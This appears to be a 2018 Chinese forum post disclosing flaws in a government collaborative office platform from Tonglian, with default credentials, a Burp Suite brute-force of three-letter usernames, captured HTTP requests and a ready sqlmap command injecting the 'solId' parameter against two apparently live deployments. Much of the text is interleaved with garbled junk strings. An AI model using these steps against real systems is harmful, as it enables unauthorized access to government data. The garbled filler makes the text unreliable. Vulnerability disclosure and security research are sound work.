|
+ I/ _: j# w7 n: C4 G
: p5 y/ o. D! c2 q. L 2 s1 M' ^% F7 j F
K' I4 |0 k, ~5 d7 t, t 平台简介:% T/ X5 f1 r# m9 M" W8 O/ N+ z7 w
: Y+ m' ~$ C2 b6 ?5 e
2 i4 p' A/ h* n3 F/ N: S2 ^
1 c7 T5 X V. h6 N! t
& G' g* o' H+ p4 p6 X
0 K+ J2 M1 {' U) x4 k; D( f 北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
7 q! \! s" P K5 n! V2 ?
同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
3 v% u- B# f$ \同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!
# N' b9 u h" J% ^! o
5 r, N- V- S$ f3 M; T0 B) u7 A% i# S+ e2 A# u `2 y) T
+ }+ R, X8 [* r: I# ^
* Y( J( ^5 t7 a- u
& }7 e' X: \" u6 |' J4 M1 D; F* S 由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:
1 L1 a! n9 n: C" L- i9 C3 S3 J
5 K! { } [" ?% t! L" W( x
8 D! V0 O0 R6 i# r9 ~) G$ q. n' l
3 Y- ?! x" H* [( _6 C
2 O' t6 N, l# p$ @' k
* O, w4 W `# _9 G http://1.1.1.1:7197/cap-aco/#(案例2-)
9 d+ k* W- ^3 F/ P/ H3 |4 r! _
# ]6 B! G6 }5 j# a% |7 w1 a6 p1 q, }4 t6 s2 ~& C% F
http://www.XXOO.com (案例1-官网网站)
4 H+ a% \ i' Y; S( q, |# ? . P, e' }, ]# [: Y8 F! ^
7 n E3 ?' o& h# a8 y$ R& a
Z$ `' @) H/ x+ o( o3 R
% `+ n B* G5 H6 ?: e: r, @% y
5 S/ T% s: ]8 }" U8 h 漏洞详情:: S9 F* v6 o& X) q& H) a4 Z6 Q
* F7 T+ [6 k) A( F7 P, L# ^$ [( D2 f; H/ P8 t. C% s
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试) g1 b- U6 a* v3 D$ n- c
- F8 h/ q5 J4 F" b! ?; i D
3 r- }) U( L: ?- g/ h g! U 首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
* U- |- n" A, A& G/ t
6 [, v8 E. _ ^5 W% `8 f" `4 o, A$ s& E9 [
: U" m8 B' u. v/ \( _" P
4 }* J4 a3 U& R* `3 s4 D/ y1 G1 G# o& N
6 J2 d. e* V+ \8 L ' V! I: o8 b2 ~3 {( a( t, v
1 o n- u/ X. o; y5 Z
status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
- `8 [/ c% {4 _% N5 ^: J9 g ( t0 X7 U: Q' V1 {; Y2 j) \
1 n- D" b$ Z4 {. K
1、案例1-官方网站
' A! j) `& @1 H/ ~( y ! E1 Z' Y, D4 z' g6 n1 \, ~7 L
3 @4 n7 c s" h) y% r, e v& j GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.19 e6 l# r, ?- A* |: S) ?) V4 o% x
5 V3 Z' G2 ~+ \; W. e
" e! a4 o, Y8 @: d6 o
Host: www.XXOO.com6 P; V5 e7 z/ O8 y3 t' ~# [
' }- S# n' Q2 g/ H$ s
& D! U6 }5 f6 p4 l6 Y: K, `6 Q' U/ Z
Proxy-Connection: Keep-Alive
* p. {+ g. J. y# a3 N! X0 a 1 ^/ \ e2 ]6 S: }5 t9 O" c3 d
7 R8 \" w" U" j/ U+ H4 t" D
Accept: application/json, text/javascript, */*; q=0.01+ d; \$ \% a, t* `
9 o( l4 _! k8 o2 K" o- E
- c6 h$ s4 ?& L" m) Q/ c6 Z Accept-Language: zh-CN
. x+ L6 }5 U% d0 i; p
, U4 ~, m$ B2 Y# G' T# j( L0 m5 \4 [2 e( ?2 [
Content-Type: application/json ~. X7 _/ t, \/ e' v& Y
. g" M4 B! q9 f% e7 T4 _
* \3 Y0 H/ e5 b I* }- s y8 a: a5 b
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko) y+ s$ R9 {+ g! M% N! w; R6 n
$ q+ c. k3 W" g+ {/ |
; Z5 ^, N0 Z! ^1 l X-Requested-With: XMLHttpRequest
" r+ f v% m" \
- K+ z8 T x( R& z' n
* |' q. U/ [% e8 G2 G" j Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
( p0 O% f9 |7 }! K$ | 4 p' v( ~% p: V' E# X
( l5 {, b) T3 M8 K6 F @6 z6 u
Accept-Encoding: gzip, deflate, sdch
6 c9 {' F% w z' W/ W" E 8 K4 |6 F6 F& n9 r" X V
* w3 E- Z! s1 h9 i Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e
* F+ {! X7 t. N) a/ t7 c
% ?3 k" l& d+ Z
) e) A4 z* G, F! `/ }( J/ w* K* e 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
, f) e* e# q: Q: s0 j ( \; S2 l, V% N4 O
6 N7 F! c v3 u. V
J( W4 r. g% M% V7 X/ r- _1 ~: d- [
U" N8 m$ l w. [
. P. J [+ K6 ~  , K9 y! k7 L5 ^5 v1 `* h
7 m2 d# a/ x9 z7 B- [
' ]1 o' R- J" S
* }7 h- c3 _7 w+ Q3 Q
7 T/ P! x, q5 F' U) }7 U0 c9 c, r) C: l) l7 _" P
0 X+ t: G# K6 J+ @6 x ) p3 V2 ~5 o% C* A
, k/ j* w5 R& r- Y' o/ q# }, x + u( S9 Y2 T6 c$ ]
! p7 i. e! Z/ O7 b" |" `" z3 a& I' X; H9 h1 R
2、案例2-某天河云平台! n3 `! k& p$ D; ^( P; Z
. q/ o3 J5 O7 \. h! Z; h, I
5 N% H6 f+ [. ]9 q GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.1
: G3 ?& W7 E2 c; G
# W1 q8 @) `0 i% _
* z) f f" A, Z* z9 j$ s* g Host: 1.1.1.:7197
( b$ }# `0 { X( p
) t( }3 |# l9 g3 N" y, r
: x* w6 p( q( \' I Accept: application/json, text/javascript, */*; q=0.01" o! s" z' d7 Q- E2 g/ [
& r) b% F9 J. f* I/ V8 w: \7 k
& ^$ q! H" a0 E- v X-Requested-With: XMLHttpRequest
. h7 J' a2 M) M. u3 K5 D % q2 p- B. h" x; k- _ A2 O
) c5 d+ p) o" W% M! L User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
. z( f+ C& o, P, S/ L9 m% k; h$ n. C r) q' D8 Y; m/ k6 n" G1 e+ r
, L6 y8 j' q4 Y) U- V Content-Type: application/json
5 c. Y( j: ]% K, Q! r- \ " d$ y( C2 R! K
5 y6 ]" L) S8 T( X8 t% l4 a! O
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008% I7 B5 G* v& b; _7 U" Z/ F
* x: z! x w& S0 I8 C1 z: x" s# {% e# t! i
Accept-Language: zh-CN,zh;q=0.8
$ O& X% J% j I+ B & ]; J' o! k. Z+ T' p# O( N& w
5 i8 l7 V9 w& v# X Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=1
, Y3 f, |5 Z5 R2 ~6 K ) t% M0 Q9 A7 X
9 ?) g ], o; h Connection: close
1 q6 r; ^3 y. |4 {+ @ ; y+ Y, Z' q7 l, U" N6 q
: Q& L2 g% e7 x+ b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:) ~% a' g+ V) ]' L) F
2 X- i9 E8 J, Q' Y- W
( t7 L/ M8 G8 R; I( m$ s 
6 I4 W5 T$ x F; d9 j. @
8 K7 a0 N+ I" Z& _, D7 d Z8 N# b/ a5 p3 J3 Z! A+ P
$ k; u: E3 p6 }' e4 }
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对